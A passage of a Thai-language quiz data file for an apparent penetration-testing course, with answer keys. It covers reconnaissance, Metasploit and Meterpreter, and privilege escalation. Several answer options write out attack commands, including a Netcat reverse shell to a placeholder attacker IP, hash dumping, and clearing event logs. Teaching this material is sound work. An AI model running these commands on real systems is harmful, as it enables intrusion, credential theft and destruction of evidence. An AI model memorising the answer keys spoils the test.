        { key: 'A', text: 'รันชุดสคริปต์ตรวจสอบช่องโหว่ที่เป็นที่รู้จัก (Known Vulnerabilities) บนบริการต่างๆ ที่ตรวจพบบนเป้าหมายโดยอัตโนมัติ' },
        { key: 'B', text: 'ลบช่องโหว่ทั้งหมดออกจากเครื่องเป้าหมาย' },
        { key: 'C', text: 'เปลี่ยนรหัสผ่านของเซิร์ฟเวอร์' },
        { key: 'D', text: 'สร้างเว็บไซต์ใหม่ให้เป้าหมาย' },
      ],
      correctAnswer: 'A',
      explanation: 'NSE ช่วยขยายขีดความสามารถของ Nmap ให้สามารถตรวจสอบช่องโหว่ CVE เฉพาะทางได้อัตโนมัติ',
      order: 9,
    },
    {
      question: 'การสแกนแบบ "Passive Reconnaissance" แตกต่างจาก "Active Reconnaissance" อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Passive เก็บข้อมูลจากบุคคลที่สามโดยไม่มีการส่งแพ็กเกจตรงไปยังเป้าหมายเลย ส่วน Active มีการส่งแพ็กเกจไปสัมผัสกับเป้าหมายโดยตรง' },
        { key: 'B', text: 'Passive ใช้เวลานานกว่า 10 ปีเสมอ' },
        { key: 'C', text: 'Active ทำงานเฉพาะในเวลากลางคืน' },
        { key: 'D', text: 'ไม่มีความแตกต่างกัน' },
      ],
      correctAnswer: 'A',
      explanation: 'Passive Recon (เช่น ค้นหา DNS จาก SecurityTrails, อ่าน CT Logs) ไม่ทิ้งร่องรอยใน Log ของเป้าหมาย ต่างจาก Active Recon (Nmap, Nikto) ที่ยิงเข้าเป้าหมายตรงๆ',
      order: 10,
    },
    {
      question: 'การค้นหา Subdomains (Subdomain Enumeration) มีความสำคัญในขั้นตอน Reconnaissance อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ช่วยขยาย Attack Surface โดยค้นหาระบบทดสอบ (staging, dev, test) หรือระบบภายในที่อาจขาดการอัปเดตความปลอดภัย' },
        { key: 'B', text: 'ช่วยทำให้เว็บหลักโหลดเร็วขึ้น' },
        { key: 'C', text: 'ช่วยเพิ่มอันดับผลการค้นหาบน Google' },
        { key: 'D', text: 'ช่วยเปลี่ยนสีธีมของเว็บไซต์' },
      ],
      correctAnswer: 'A',
      explanation: 'ระบบ Staging/Dev ย่อยๆ มักมีมาตรการรักษาความปลอดภัยที่หย่อนยานกว่าเว็บหลัก ทำให้กลายเป็นประตูบานแรกที่แฮกเกอร์ใช้เจาะเข้าองค์กร',
      order: 11,
    },
    {
      question: 'เครื่องมือ "theHarvester" นิยมนำมาใช้ทำอะไรในขั้นตอนรวบรวมข้อมูล?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ค้นหาอีเมล, รายชื่อพนักงาน, ซับโดเมน, และพอร์ตเปิดจาก Search Engine และฐานข้อมูลสาธารณะต่างๆ' },
        { key: 'B', text: 'เก็บเกี่ยวผลผลิตทางการเกษตร' },
        { key: 'C', text: 'ลบอีเมลขยะในกล่องข้อความ' },
        { key: 'D', text: 'ทำความสะอาดฮาร์ดดิสก์' },
      ],
      correctAnswer: 'A',
      explanation: 'theHarvester รวบรวมข้อมูลรายชื่อบุคลากรและอีเมลขององค์กรเป้าหมาย เพื่อนำไปใช้ประเมินความเสี่ยงด้าน Phishing หรือ Password Spraying',
      order: 12,
    },
    {
      question: 'สถานะของพอร์ตที่ Nmap รายงานว่า "Filtered" มีความหมายว่าอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'มี Firewall, Filter หรือ Packet Filtering ปิดกั้นอยู่ ทำให้แพ็กเกจส่งไปไม่ถึงหรือไม่มีการตอบสนองกลับมา' },
        { key: 'B', text: 'พอร์ตนั้นเปิดให้บริการและพร้อมเชื่อมต่อ' },
        { key: 'C', text: 'พอร์ตนั้นปิดอยู่แน่นอน 100%' },
        { key: 'D', text: 'เครื่องเซิร์ฟเวอร์กำลังถูกรีบูต' },
      ],
      correctAnswer: 'A',
      explanation: 'Filtered หมายความว่า Nmap ไม่สามารถระบุได้ว่าพอร์ตเปิดหรือปิด เพราะมีไฟร์วอลล์ดักทิ้งแพ็กเกจ (Drop) ทำให้ไม่มีข้อมูลตอบกลับ',
      order: 13,
    },
    {
      question: 'คำสั่ง Nmap `-T4` หรือ `-T2` ใช้สำหรับปรับแต่งค่าอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Timing Template (ปรับระดับความเร็วและจังหวะการส่งแพ็กเกจเพื่อความรวดเร็ว หรือเพื่อหลบเลี่ยง IDS/IPS)' },
        { key: 'B', text: 'ปรับขนาดตัวอักษรของผลลัพธ์' },
        { key: 'C', text: 'ปรับจำนวนหน้าจอแสดงผล' },
        { key: 'D', text: 'ตั้งเวลาปิดเครื่องอัตโนมัติ' },
      ],
      correctAnswer: 'A',
      explanation: 'T0-T5 กำหนดความเร็ว: T2 (Polite) สแกนช้าเพื่อไม่ให้เครือข่ายโหลดหนักและหลบ IDS, ส่วน T4 (Aggressive) สแกนเร็วเหมาะกับเครือข่ายที่เสถียร',
      order: 14,
    },
    {
      question: 'เครื่องมือ "Amass" หรือ "sublist3r" มีหน้าที่หลักคืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'รวบรวมรายชื่อ Subdomain ของเป้าหมายผ่านเทคนิคทั้ง Active และ Passive OSINT' },
        { key: 'B', text: 'แคร็กรหัสผ่าน ZIP file' },
        { key: 'C', text: 'สร้างรหัสผ่านอัตโนมัติ' },
        { key: 'D', text: 'บีบอัดรูปภาพ PNG' },
      ],
      correctAnswer: 'A',
      explanation: 'OWASP Amass ใช้เทคนิคหลากหลาย (DNS Brute Force, Scraping, Certificate Transparency) เพื่อทำแผนที่ระบบเครือข่ายของเป้าหมาย',
      order: 15,
    },
    {
      question: 'การตรวจสอบข้อมูล "WHOIS" ของโดเมนมีประโยชน์อย่างไรในขั้นตอน Reconnaissance?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ดูข้อมูลผู้จดทะเบียนโดเมน, องค์กรเจ้าของ, วันหมดอายุ, Name Servers, และข้อมูลการติดต่อของผู้ดูแลระบบ' },
        { key: 'B', text: 'ดาวน์โหลด Source Code ของเว็บไซต์' },
        { key: 'C', text: 'ดูรหัสผ่านของผู้ดูแลระบบ' },
        { key: 'D', text: 'เปลี่ยนเจ้าของโดเมนทันที' },
      ],
      correctAnswer: 'A',
      explanation: 'WHOIS ให้ข้อมูลการเป็นเจ้าของโดเมนและเนมเซิร์ฟเวอร์ ซึ่งเป็นจุดเริ่มต้นที่ดีในการทำแผนผังองค์กร',
      order: 16,
    },
    {
      question: 'ข้อใดคือความเสี่ยงด้านความปลอดภัยของโฟลเดอร์ `.git` ที่เปิดทิ้งไว้บนเว็บเซิร์ฟเวอร์ Production (`https://example.com/.git/`)?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ผู้โจมตีสามารถดาวน์โหลด Source Code ทั้งหมดของเว็บไซต์ รวมถึงประวัติการ Commit, API Keys, และรหัสผ่านที่เคยบันทึกไว้ได้' },
        { key: 'B', text: 'ทำให้หน้าเว็บแสดงผลเป็นภาษาอื่น' },
        { key: 'C', text: 'ทำให้พื้นที่ฮาร์ดดิสก์ลดลง 10GB' },
        { key: 'D', text: 'ไม่มีความเสี่ยงใดๆ เพราะ Git ปลอดภัยในตัว' },
      ],
      correctAnswer: 'A',
      explanation: 'โฟลเดอร์ .git เก็บ Source Code ทั้งโปรเจกต์ เครื่องมืออย่าง git-dumper สามารถดูดกลับมาสร้างโค้ดต้นฉบับได้ทั้งหมด',
      order: 17,
    },
    {
      question: 'Banner Grabbing (การดึงข้อมูล Banner) ช่วยให้นักทดสอบความปลอดภัยทราบข้อมูลใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ชื่อซอฟต์แวร์และเวอร์ชันที่เปิดให้บริการ เช่น `Server: Apache/2.4.50 (Unix)` หรือ `SSH-2.0-OpenSSH_7.4`' },
        { key: 'B', text: 'แบนเนอร์โฆษณาสินค้าบนหน้าเว็บ' },
        { key: 'C', text: 'โลโก้ของบริษัทเป้าหมาย' },
        { key: 'D', text: 'ราคาของการ์ดจอในตลาด' },
      ],
      correctAnswer: 'A',
      explanation: 'Banner Grabbing คือการเชื่อมต่อไปยังพอร์ตแล้วอ่านข้อความต้อนรับของ Service เพื่อค้นหาว่ามีช่องโหว่ในเวอร์ชันนั้นหรือไม่',
      order: 18,
    },
    {
      question: 'คำสั่ง Nmap `-sn` (เดิมคือ `-sP`) มีหน้าที่ทำอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Ping Scan / Host Discovery (ค้นหาว่ามีโฮสต์ใดกำลังเปิดทำงานอยู่บ้างโดยไม่ต้องสแกนพอร์ต)' },
        { key: 'B', text: 'สแกนเฉพาะพอร์ต Secure Network' },
        { key: 'C', text: 'ส่งอีเมลแจ้งเตือน' },
        { key: 'D', text: 'บันทึกภาพหน้าจอ' },
      ],
      correctAnswer: 'A',
      explanation: '`-sn` ตรวจสอบสถานะ Online ของเครื่องในวง Network อย่างรวดเร็วโดยไม่เสียเวลาไล่เช็คพอร์ตทีละพอร์ต',
      order: 19,
    },
    {
      question: 'การค้นหาข้อมูลใน "Certificate Transparency Logs" (เช่น crt.sh) มีประโยชน์อย่างไรในงาน OSINT?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ค้นหารายชื่อ Subdomains และโดเมนทั้งหมดที่เคยมีการออกใบรับรอง SSL/TLS ในชื่อขององค์กรนั้นในอดีต' },
        { key: 'B', text: 'แคร็กรหัสผ่านของ SSL Certificate' },
        { key: 'C', text: 'ลบใบรับรองออกจากอินเทอร์เน็ต' },
        { key: 'D', text: 'ดูประวัติการแชทของพนักงาน' },
      ],
      correctAnswer: 'A',
      explanation: 'CT Logs บันทึกใบรับรองทุกใบในโลก ทำให้เราค้นหา Subdomains (รวมถึง internal/staging domains) ของเป้าหมายได้อย่างครบถ้วน',
      order: 20,
    },
  ],

  // 5. Metasploit, Payloads & Shells
  'lesson-i3-1': [
    {
      question: 'ใน Metasploit Framework ข้อใดอธิบายความแตกต่างระหว่าง "Exploit" และ "Payload" ได้ถูกต้องที่สุด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Exploit คือกลไกหรือโค้ดที่ใช้เจาะผ่านช่องโหว่ ส่วน Payload คือโค้ดที่จะถูกนำไปรันบนเครื่องเหยื่อหลังจากเจาะสำเร็จ (เช่น Reverse Shell)' },
        { key: 'B', text: 'Exploit คือไวรัส ส่วน Payload คือโปรแกรมสแกนไวรัส' },
        { key: 'C', text: 'ทั้งสองคำมีความหมายเหมือนกันทุกประการ' },
        { key: 'D', text: 'Exploit ใช้บนมือถือ ส่วน Payload ใช้บนคอมพิวเตอร์' },
      ],
      correctAnswer: 'A',
      explanation: 'Exploit เปรียบเหมือนกุญแจผีที่ใช้เปิดประตู (ช่องโหว่) ส่วน Payload เปรียบเหมือนสัมภาระหรือสิ่งที่จะทำเมื่อเข้าไปในบ้านได้แล้ว',
      order: 1,
    },
    {
      question: 'ข้อใดคือความแตกต่างสำคัญระหว่าง "Reverse Shell" และ "Bind Shell"?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Reverse Shell ให้เครื่องเหยื่อเป็นฝ่ายต่อกลับมาหาเครื่องแฮกเกอร์ (ผ่าน NAT/Firewall ได้ดีกว่า) ส่วน Bind Shell เครื่องเหยื่อจะเปิดพอร์ตรับการเชื่อมต่อ' },
        { key: 'B', text: 'Bind Shell ทำงานเร็วกว่า Reverse Shell 1,000 เท่า' },
        { key: 'C', text: 'Reverse Shell ใช้ได้เฉพาะกับระบบ Linux เท่านั้น' },
        { key: 'D', text: 'Bind Shell ไม่ต้องใช้ IP Address' },
      ],
      correctAnswer: 'A',
      explanation: 'Reverse Shell ได้รับความนิยมมากกว่ามาก เพราะไฟร์วอลล์ส่วนใหญ่มักบล็อกทราฟฟิกขาเข้า (Inbound) แต่ยอมให้ทราฟฟิกขาออก (Outbound) วิ่งออกไปได้',
      order: 2,
    },
    {
      question: 'เครื่องมือ "Meterpreter" ใน Metasploit มีคุณสมบัติเด่นอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เป็น Advanced Dynamic Payload ที่ทำงานในหน่วยความจำ RAM (In-Memory Injection) ไม่ทิ้งไฟล์ลงดิสก์ และมีฟังก์ชันบริหารจัดการเครื่องเหยื่อครบวงจร' },
        { key: 'B', text: 'เป็นระบบปฏิบัติการชนิดหนึ่ง' },
        { key: 'C', text: 'เป็นโปรแกรมคำนวณภาษี' },
        { key: 'D', text: 'เป็นภาษาเขียนโปรแกรมใหม่' },
      ],
      correctAnswer: 'A',
      explanation: 'Meterpreter มีความยืดหยุ่นสูง หลบเลี่ยง Antivirus ได้ดีเพราะทำงานบน Memory โดยตรง มีคำสั่งเช่น getsystem, hashdump, screenshot, portfwd',
      order: 3,
    },
    {
      question: 'เครื่องมือ `msfvenom` มีบทบาทหน้าที่หลักอะไรในการทดสอบเจาะระบบ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'สร้าง (Generate) และเข้ารหัส (Encode) ชิ้นส่วน Standalone Payloads ในรูปแบบไฟล์ต่างๆ (เช่น .exe, .elf, .apk, .war, .php)' },
        { key: 'B', text: 'สแกนหาไวรัสในอีเมล' },
        { key: 'C', text: 'กู้คืนไฟล์รูปภาพที่ถูกลบ' },
        { key: 'D', text: 'ลบระบบปฏิบัติการ Windows ทิ้ง' },
      ],
      correctAnswer: 'A',
      explanation: 'msfvenom เป็นการรวมตัวกันของ msfpayload และ msfencode ใช้สร้างไฟล์ Payload ปรับแต่งตามที่ต้องการ',
      order: 4,
    },
    {
      question: 'คำสั่งใดใน Metasploit ใช้สำหรับตั้งค่าเครื่องรับการเชื่อมต่อกลับ (Listener) จาก Reverse Shell Payload?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`use exploit/multi/handler`' },
        { key: 'B', text: '`use auxiliary/scanner/portscan`' },
        { key: 'C', text: '`use post/windows/gather/credentials`' },
        { key: 'D', text: '`exit`' },
      ],
      correctAnswer: 'A',
      explanation: '`multi/handler` เป็น Generic Payload Handler ที่ใช้ดักรอรับการเชื่อมต่อกลับจาก Reverse Shell หรือ Meterpreter payloads',
      order: 5,
    },
    {
      question: 'ใน Metasploit พารามิเตอร์ `LHOST` และ `LPORT` หมายถึงอะไรตามลำดับ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'IP Address ของเครื่องผู้โจมตี (Local Host) และหมายเลขพอร์ตที่ผู้โจมตีดักฟังรอรับ Connection' },
        { key: 'B', text: 'IP Address ของเครื่องเหยื่อ และพอร์ตที่เปิดอยู่ของเหยื่อ' },
        { key: 'C', text: 'ความยาวของรหัสผ่าน และความเร็วอินเทอร์เน็ต' },
        { key: 'D', text: 'หมายเลขประจำตัวเครื่องคอมพิวเตอร์' },
      ],
      correctAnswer: 'A',
      explanation: 'LHOST (Listening Host) และ LPORT (Listening Port) กำหนดจุดที่เหยื่อต้องต่อย้อนกลับมา (เครื่องแฮกเกอร์)',
      order: 6,
    },
    {
      question: 'ใน Metasploit พารามิเตอร์ `RHOSTS` และ `RPORT` หมายถึงอะไรตามลำดับ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'IP Address ของเป้าหมาย (Remote Hosts) และหมายเลขพอร์ตบริการของเป้าหมายที่จะทำการ Exploit' },
        { key: 'B', text: 'IP ของเราเตอร์ Wi-Fi' },
        { key: 'C', text: 'ชื่อของไฟล์รูปภาพ' },
        { key: 'D', text: 'หมายเลขบัตรประชาชน' },
      ],
      correctAnswer: 'A',
      explanation: 'RHOSTS (Remote Hosts) และ RPORT (Remote Port) คือที่อยู่และพอร์ตของระบบเป้าหมายที่จะถูกโจมตี',
      order: 7,
    },
    {
      question: 'คำสั่ง Meterpreter ใดที่ใช้พยายามยกระดับสิทธิ์ขึ้นสู่ระดับ NT AUTHORITY\\SYSTEM บนเครื่อง Windows อัตโนมัติ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`getsystem`' },
        { key: 'B', text: '`sysinfo`' },
        { key: 'C', text: '`pwd`' },
        { key: 'D', text: '`reboot`' },
      ],
      correctAnswer: 'A',
      explanation: '`getsystem` รวบรวมเทคนิค Privilege Escalation หลากหลายรูปแบบ (เช่น Named Pipe Impersonation) เพื่อยกระดับสิทธิ์เป็น SYSTEM',
      order: 8,
    },
    {
      question: 'คำสั่ง Meterpreter ใดใช้ดึงรหัสผ่านที่ผ่านการแฮช (Password Hashes) ออกมาจากฐานข้อมูล SAM ของเครื่องเหยื่อ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`hashdump`' },
        { key: 'B', text: '`ipconfig`' },
        { key: 'C', text: '`clearev`' },
        { key: 'D', text: '`download`' },
      ],
      correctAnswer: 'A',
      explanation: '`hashdump` ดึงค่า NTLM Hashes ของ Local Accounts ออกมาเพื่อนำไปทำ Pass-the-Hash หรือถอดรหัสด้วย Hashcat ต่อไป',
      order: 9,
    },
    {
      question: 'ตัวเลือก "Staged Payload" (เช่น `windows/meterpreter/reverse_tcp`) แตกต่างจาก "Stageless / Inline Payload" (เช่น `windows/meterpreter_reverse_tcp`) อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Staged ส่ง Payload ขนาดเล็กมาก (Stager) เข้าไปก่อน แล้วค่อยดาวน์โหลด Stage ตัวเต็มตามมา ส่วน Stageless รวมทุกอย่างไว้ในไฟล์เดียว' },
        { key: 'B', text: 'Staged ทำงานได้เฉพาะบน Linux' },
        { key: 'C', text: 'Stageless ไม่มีการเข้ารหัส' },
        { key: 'D', text: 'ไม่มีความแตกต่างกัน' },
      ],
      correctAnswer: 'A',
      explanation: 'Staged payloads เหมาะกับ Exploit ที่มีพื้นที่ Buffer จำกัด โดยส่งตัวเล็กเข้าไปก่อนเพื่อดึงตัวใหญ่ตามมาภายหลัง',
      order: 10,
    },
    {
      question: 'คำสั่ง `clearev` ใน Meterpreter มีหน้าที่ทำอะไร และส่งผลกระทบอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ลบ Event Logs ทั้งหมด (Application, System, Security) บนเครื่อง Windows เพื่อทำลายหลักฐานการบุกรุก' },
        { key: 'B', text: 'ลบไฟล์มัลแวร์ในเครื่อง' },
        { key: 'C', text: 'ปิดหน้าต่างโปรแกรมที่เปิดอยู่' },
        { key: 'D', text: 'เปิดกล้องเว็บแคม' },
      ],
      correctAnswer: 'A',
      explanation: '`clearev` พยายามล้าง Event Logs ทั้งหมดบนเครื่องเหยื่อ (อย่างไรก็ตามจะทำให้เกิด Event 1102 บันทึกว่า Log ถูกลบ)',
      order: 11,
    },
    {
      question: 'เครื่องมือ "Netcat" (nc) มักถูกขนานนามในวงการความมั่นคงปลอดภัยว่าอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Swiss Army Knife ของระบบเครือข่าย (มีดพับสวิสสารพัดประโยชน์)' },
        { key: 'B', text: 'โปรแกรมพิมพ์งานออฟฟิศ' },
        { key: 'C', text: 'ระบบป้องกันไวรัสที่ดีที่สุด' },
        { key: 'D', text: 'เว็บเบราว์เซอร์ความเร็วสูง' },
      ],
      correctAnswer: 'A',
      explanation: 'Netcat มีความยืดหยุ่นสูงมาก สามารถใช้ทำ Port scanning, Banner grabbing, File transfer, สร้าง Bind shell และ Reverse shell ได้อย่างง่ายดาย',
      order: 12,
    },
    {
      question: 'คำสั่ง `nc -lvnp 4444` บน Netcat มีความหมายว่าอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เปิด Listen (ดักฟัง) รอรับการเชื่อมต่อบนพอร์ต 4444 พร้อมแสดงผลแบบ Verbose และไม่แปลงชื่อโดเมน (Numeric)' },
        { key: 'B', text: 'สแกนหาไวรัสบนพอร์ต 4444' },
        { key: 'C', text: 'ลบข้อมูลบนพอร์ต 4444' },
        { key: 'D', text: 'รีสตาร์ทเราเตอร์บนพอร์ต 4444' },
      ],
      correctAnswer: 'A',
      explanation: '`-l` = listen, `-v` = verbose, `-n` = numeric IP only, `-p` = port number ใช้สำหรับเตรียมรับ Reverse shell connection',
      order: 13,
    },
    {
      question: 'คำสั่ง Netcat Reverse Shell บนเครื่อง Linux เป้าหมายมักเขียนในรูปแบบใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`nc <ATTACKER_IP> 4444 -e /bin/bash` หรือใช้ FIFO named pipes' },
        { key: 'B', text: '`ping <ATTACKER_IP>`' },
        { key: 'C', text: '`ls -la`' },
        { key: 'D', text: '`chmod 777`' },
      ],
      correctAnswer: 'A',
      explanation: 'ตัวเลือก `-e /bin/bash` จะส่งคำสั่ง Standard Input/Output ของ Bash Shell ข้ามเครือข่ายไปยังเครื่องผู้โจมตีทันที',
      order: 14,
    },
    {
      question: 'โมดูลประเภท "Auxiliary" ใน Metasploit แตกต่างจาก "Exploit" อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Auxiliary ใช้สำหรับกิจกรรมสแกน, สำรวจ, และตรวจสอบ (เช่น Port Scanner, Fuzzer, Brute-forcer) โดยไม่มีการส่ง Payload ฝังลงเครื่องเป้าหมาย' },
        { key: 'B', text: 'Auxiliary ใช้สร้างไฟล์เอกสาร PDF' },
        { key: 'C', text: 'Auxiliary เป็นโมดูลที่อันตรายกว่า Exploit 100 เท่า' },
        { key: 'D', text: 'ไม่มีความแตกต่างกัน' },
      ],
      correctAnswer: 'A',
      explanation: 'Exploits มีการผูกกับ Payloads เพื่อยึดครองระบบ ส่วน Auxiliary เน้นการทำงานเสริม เช่น สแกนหาบริการ, Brute-force รหัสผ่าน, หรือ DoS',
      order: 15,
    },
    {
      question: 'โมดูล "Post-Exploitation" (Post Modules) ใน Metasploit ถูกนำมาใช้งานในขั้นตอนใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ใช้งานหลังจากยึดระบบหรือได้ Session แล้ว เพื่อเก็บข้อมูลลับเพิ่มเติม, สำรวจเครือข่ายภายใน, หรือคงสิทธิ์ (Persistence)' },
        { key: 'B', text: 'ใช้งานก่อนเริ่มเปิดเครื่องคอมพิวเตอร์' },
        { key: 'C', text: 'ใช้งานเฉพาะตอนติดตั้ง Metasploit ครั้งแรก' },
        { key: 'D', text: 'ใช้งานสำหรับถอนการติดตั้งโปรแกรม' },
      ],
      correctAnswer: 'A',
      explanation: 'Post modules (เช่น post/windows/gather/enum_logged_on_users) ช่วยอำนวยความสะดวกในการสำรวจระบบเป้าหมายหลังบุกรุกสำเร็จ',
      order: 16,
    },
    {
      question: 'เทคนิค "Encoder" (เช่น `shikata_ga_nai` ใน msfvenom) ถูกออกแบบมาเพื่อวัตถุประสงค์ใดเป็นหลักในอดีต?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'กำจัด Bad Characters (เช่น `\\x00` Null Byte) เพื่อให้ Payload ทำงานได้โดยไม่พังในหน่วยความจำ' },
        { key: 'B', text: 'ทำให้ Payload ทรงพลังมากขึ้น 10 เท่า' },
        { key: 'C', text: 'ทำให้ไวรัสสามารถข้ามสายแลนได้' },
        { key: 'D', text: 'บีบอัดไฟล์ให้เหลือ 1 ไบต์' },
      ],
      correctAnswer: 'A',
      explanation: 'วัตถุประสงค์หลักของ Encoders คือการแปลงโค้ดหลีกเลี่ยง Bad Characters ใน Buffer Exploit (การหลบ AV เป็นเพียงผลพลอยได้ในอดีต)',
      order: 17,
    },
    {
      question: 'คำสั่ง `sessions -i 1` ใน Metasploit ใช้สำหรับทำอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เข้าสู่โหมดโต้ตอบ (Interact) กับ Session หมายเลข 1 ที่เชื่อมต่อเปิดอยู่' },
        { key: 'B', text: 'ลบ Session หมายเลข 1 ทิ้ง' },
        { key: 'C', text: 'สร้าง Session ใหม่' },
        { key: 'D', text: 'รีบูตเครื่องเป้าหมาย' },
      ],
      correctAnswer: 'A',
      explanation: '`-i` ย่อมาจาก Interact เพื่อสลับหน้าต่างควบคุมเข้าไปสั่งการใน Shell หรือ Meterpreter session นั้นๆ',
      order: 18,
    },
    {
      question: 'คำสั่ง `background` หรือคีย์ลัด `Ctrl + Z` ใน Meterpreter มีประโยชน์อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ย้าย Session ปัจจุบันไปทำงานเบื้องหลังชั่วคราว เพื่อกลับมาสั่งการบนหน้าต่าง msfconsole หลักได้โดยไม่ตัดการเชื่อมต่อ' },
        { key: 'B', text: 'ปิดเครื่องคอมพิวเตอร์ของเหยื่อ' },
        { key: 'C', text: 'ตัดการเชื่อมต่อและลบมัลแวร์ทิ้ง' },
        { key: 'D', text: 'เปลี่ยนสีพื้นหลังของหน้าจอ' },
      ],
      correctAnswer: 'A',
      explanation: 'ช่วยให้ผู้โจมตีสามารถกลับมาใช้โมดูลอื่นใน msfconsole (เช่น สแกนหาเป้าหมายเครื่องถัดไป) โดยที่เซสชันเดิมยังคงทำงานค้างอยู่',
      order: 19,
    },
    {
      question: 'การใช้คำสั่ง `portfwd add -l 3389 -p 3389 -r 192.168.1.50` ใน Meterpreter มีเป้าหมายเพื่อทำอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ทำ Port Forwarding ส่งต่อพอร์ต RDP จากเครื่องเป้าหมายในวง LAN ภายในมายังเครื่องผู้โจมตี (Pivoting)' },
        { key: 'B', text: 'บล็อกพอร์ต 3389 ถาวร' },
        { key: 'C', text: 'ลบรหัสผ่าน Windows' },
        { key: 'D', text: 'รีสตาร์ทเราเตอร์ Wi-Fi' },
      ],
      correctAnswer: 'A',
      explanation: 'Meterpreter portfwd ช่วยให้ผู้โจมตีสามารถเชื่อมต่อไปยังบริการของเครื่องอื่นๆ ในเครือข่ายภายใน (Pivoting) ผ่านเครื่องเหยื่อที่เป็นฐานได้',
      order: 20,
    },
  ],

  // 6. Privilege Escalation & Lateral Movement
  'lesson-i3-2': [
    {
      question: 'แนวคิด "Privilege Escalation" (การยกระดับสิทธิ์) ในการโจมตีทางไซเบอร์คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การอาศัยช่องโหว่ ข้อผิดพลาดในการตั้งค่า หรือบั๊ก เพื่อเพิ่มระดับสิทธิ์ของบัญชีตนเองจากผู้ใช้ธรรมดาขึ้นสู่ระดับสูงสุด (root หรือ SYSTEM)' },
        { key: 'B', text: 'การเพิ่มความเร็วการดาวน์โหลดไฟล์' },
        { key: 'C', text: 'การเปลี่ยนรูปโปรไฟล์ของผู้ใช้' },
        { key: 'D', text: 'การเพิ่มขนาดของแรมในเครื่อง' },
      ],
      correctAnswer: 'A',
      explanation: 'Privilege Escalation ช่วยให้ผู้โจมตีที่ยึดบัญชีทั่วไปได้ สามารถไต่เต้าจนได้สิทธิ์ระดับสูงสุดเพื่อควบคุมทั้งเครื่องได้อย่างเบ็ดเสร็จ',
      order: 1,
    },
    {
      question: 'ข้อใดอธิบายความแตกต่างระหว่าง "Vertical Privilege Escalation" และ "Horizontal Privilege Escalation" ได้ถูกต้อง?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Vertical คือการไต่ระดับจากผู้ใช้ทั่วไปขึ้นเป็น Admin ส่วน Horizontal คือการเข้าถึงข้อมูลหรือบัญชีของผู้อื่นที่มีระดับสิทธิ์เท่ากัน' },
        { key: 'B', text: 'Vertical ใช้บนมือถือ ส่วน Horizontal ใช้บนเซิร์ฟเวอร์' },
        { key: 'C', text: 'Vertical ใช้สำหรับเล่นเกม ส่วน Horizontal ใช้สำหรับพิมพ์งาน' },
        { key: 'D', text: 'ไม่มีความแตกต่างกัน' },
      ],
      correctAnswer: 'A',
      explanation: 'Vertical (แนวตั้ง) = User -> Admin, Horizontal (แนวนอน) = User A เข้าถึงข้อมูลของ User B โดยไม่ได้รับอนุญาต',
      order: 2,
    },
    {
      question: 'บนระบบ Linux การพบไฟล์ Binary ที่มีสิทธิ์ SUID และเป็นของ root (เช่น `find / -perm -u=s -type f 2>/dev/null`) อาจนำไปสู่ช่องโหว่อะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Local Privilege Escalation หาก Binary นั้นมีช่องโหว่หรือสามารถหลุดออกสู่ Shell ได้ (GTFOBins)' },
        { key: 'B', text: 'ทำให้ฮาร์ดดิสก์เสียหาย' },
        { key: 'C', text: 'ทำให้หน้าจอเป็นสีดำ' },
        { key: 'D', text: 'เพิ่มความเร็วของซีพียู' },
      ],
      correctAnswer: 'A',
      explanation: 'หากโปรแกรมที่มี SUID root สามารถถูกสั่งให้อ่านไฟล์ รันสคริปต์ หรือสปอว์นเชลล์ (เช่น vim, nmap, find) ผู้ใช้จะได้รับสิทธิ์ root ทันที',
      order: 3,
    },
    {
      question: 'เว็บไซต์ "GTFOBins" (gtfobins.github.io) มีประโยชน์อย่างไรสำหรับผู้ศึกษาความปลอดภัยระบบ Linux?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
